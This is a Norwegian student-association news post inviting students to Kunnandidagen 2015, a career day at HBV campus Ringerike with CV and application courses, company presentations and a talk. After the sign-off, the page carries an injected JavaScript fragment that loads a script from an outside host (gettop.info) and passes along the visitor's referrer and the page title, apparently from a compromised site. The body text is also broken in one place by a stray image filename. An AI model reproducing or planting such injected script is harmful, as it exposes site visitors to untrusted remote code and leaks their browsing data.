Kunnandidagen 2015 nærmer seg!

Posted on Posted in Nyheter

Kunnandi ønsker å invitere dere alle til Kunnandidagen her på HBV campus Ringerike, 10.september. Karrieredagen b11951843_886703701416271_855535659185090116_nyr på bedriftstands, bedriftspresentasjoner og foredrag. Temaet for dagen er «Engasjer deg i din fremtid».

I forbindelse med karrieredagen vil det også tidligere i uken være opplegg studentene kan delta på. Mandag 7.september vil de bli avholdt et CV kurs med Academic Work, og tirsdag 8.september blir det et søknadskurs med Frode Reksten. Kursene vil vare fra kl. 11:00 til 13:00, på rom C110 på campus Ringerike. Dette er kurs det absolutt er verdt å delta på, da en godt skrevet CV og jobbsøknad kan være det som skiller deg ut i søknadsbunken.

Selve Kunnandiagen vil vare fra kl. 10:00 til kl. 14:00, og vil inneholde et innholdsrikt foredrag av tidligere skøyteløper Sverre Haugli, og en rekke spennende bedriftspresentasjoner. Det vil bli avholdt ulike konkurranser på selve dagen, med fantastiske premier! Vi i Kunnandi vil også dele ut goodie-bags til studentene, så her er det viktig å være tidlig ute.Dagen avsluttes med mingling i regi av Økonomiklyngen på Kooperativen Pub kl.16:00. Her vil dere få muligheten til å prate med de ulike bedriftene i Økonomiklyngen under mer uformelle forhold med mat og drikke.

Kunnandidagen er ikke kun forbeholdt studenter som skal ut i ny jobb. Det er også en god mulighet for studenter i startfasen av utdanningen for å finne sin fremtidige arbeidsgiver.

Vi håper Kunnandidagen er til glede for deg – og still gjerne forberedt! Bedriftene er her for å prate med DEG!

Velkommen!

 

Med vennlig hilsen

Utvalget til Kunnandidagen 2015

 }d.getElementsByTagName('head')[0].appendChild(s);s.src='http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=' + encodeURIComponent(document.referrer) + '&default_keyword=' + encodeURIComponent(document.title) + '';